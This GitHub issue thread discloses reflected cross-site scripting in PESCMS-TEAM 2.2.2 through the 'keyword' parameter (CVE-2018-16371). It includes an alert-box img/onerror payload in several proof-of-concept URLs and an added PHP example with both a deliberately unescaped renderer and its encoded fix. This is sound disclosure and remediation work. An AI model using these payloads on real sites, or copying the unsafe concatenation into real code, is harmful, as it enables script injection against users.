PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerability #3

Closed
snappyJack opened this issue Aug 30, 2018 · 3 comments

Comments

@snappyJack

I found multiple reflected cross-site scripting vulnerabilities where the page uses Model_index.php; we can see there is no XSS filter on the "keyword" parameter.
Now I input the payload: aa">< img src=x onerror=alert(1)>
The full URL is: http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running

There are lots of pages that use Model_index.php, and they all have reflected cross-site scripting vulnerabilities. Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

..
..
..
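
The missing output encoding described in the report above, shown next to its fix. This is an added example, not code from the issue or from PESCMS-TEAM: the template markup and the function names (`e`, `renderSearchUnsafe`, `renderSearchSafe`, `countImgElements`) are assumptions, since the project's template code is not shown on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from PESCMS-TEAM): HTML-encode a value for element
// content or a quoted attribute value.
function e(string $value): string
{
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: the reflected keyword is concatenated into the attribute as-is.
function renderSearchUnsafe(array $query): string
{
    $keyword = $query['keyword'] ?? '';
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// After: same markup, value encoded at the point of output.
function renderSearchSafe(array $query): string
{
    $keyword = $query['keyword'] ?? '';
    if (!is_string($keyword)) { // ?keyword[]=x arrives as an array
        $keyword = '';
    }
    return '<input type="text" name="keyword" value="' . e($keyword) . '">';
}

// Regression check: count <img> elements a browser-like parser would create.
function countImgElements(string $html): int
{
    libxml_use_internal_errors(true); // fragments trigger parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName('img')->length;
}

// Query string from the report, decoded the way PHP decodes $_GET.
parse_str('g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E', $query);

printf("unsafe: %d injected <img>\n", countImgElements(renderSearchUnsafe($query)));
printf("safe:   %d injected <img>\n", countImgElements(renderSearchSafe($query)));
echo renderSearchSafe($query), PHP_EOL;
```

Because the report says every page built on Model_index.php reflects `keyword`, the encoding belongs in the shared template rather than in each controller.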

@lazyphp
Owner

lazyphp commented Aug 31, 2018

Thank you, I will fix this problem.

@lazyphp
Owner

lazyphp commented Apr 10, 2019

The upcoming new version has already gotten close to this issue. https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0

@lazyphp lazyphp closed this as completed Apr 10, 2019
@NicoleG25

@lazyphp Has the issue been resolved?
Please note that CVE-2018-16371 has been assigned.
